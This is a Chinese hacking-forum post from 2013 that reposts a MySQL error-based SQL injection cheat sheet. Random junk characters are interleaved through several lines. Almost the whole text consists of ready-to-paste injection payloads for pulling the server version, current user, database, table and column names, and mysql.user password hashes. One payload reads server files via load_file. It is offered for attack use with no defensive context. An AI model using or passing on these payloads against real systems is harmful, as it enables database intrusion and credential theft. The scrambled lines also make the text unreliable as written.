Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑


9 o3 |: b2 B$ `7 w  Q5 @0 [Mysql暴错注入参考（pdf），每天一贴。。。
, a* K1 |2 p! O% [: u/ J
MySql Error Based Injection Reference
, L( ?& c) a9 V8 A[Mysql暴错注入参考]
" \0 S0 h* ]1 A; R) n) Q6 E2 l' }1 nAuthornig0s1992
1 v7 H; i& z1 g' C* d5 h( S4 K+ @; tBlog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
! W( d# {4 s; S/ b, rMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
3 _2 p5 j4 L% U, ]$ G小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
5 R7 \/ W( U+ w/ _- a6 lMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
" |7 S* p& R: N& Bjoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
& L. J3 i' v5 v" G  D7 FMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
8 o7 r2 j- |. _% R7 a1 U$ ~, QMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
$ \" B9 S2 d, R# l; J/ y顺序替换
  ^- |8 H. Q/ A1 |爆指定库数目:
- C( v2 }  O/ [2 U  K1 g  rand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
* g/ H/ T5 g1 Y& G& `9 J7 J" |able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
1 Z* U/ X3 }8 land+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
5 Q+ T2 Z" m5 O- s; Table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
7 y! C* Z+ c! G# Z6 J1 l+ \/ Z; f0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
# G! n# A: i9 A; I; {9 d) |% s+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
4 l( \2 E2 O1 k3 S: J$ O8 C9 B0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
8 R( E& ^1 ~% Fand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
  W# X0 D: [  I+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
* \/ ?- ?. w; @, ploor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
6 l( x1 ?) |  d; i7 a/ Q依次暴内容:
7 ^, u& V8 L( P) f3 X0 j  g; I3 jand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
) I8 m- [& V: k6 [  M& ?爆文件内容:
' S( \4 ?) |! B! K' R  Y" S( _4 Fand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

9 k+ k; D& G# ]* K8 n2 R不要下载也可以，
& y1 c! ^" X) z+ S3 s2 w1 q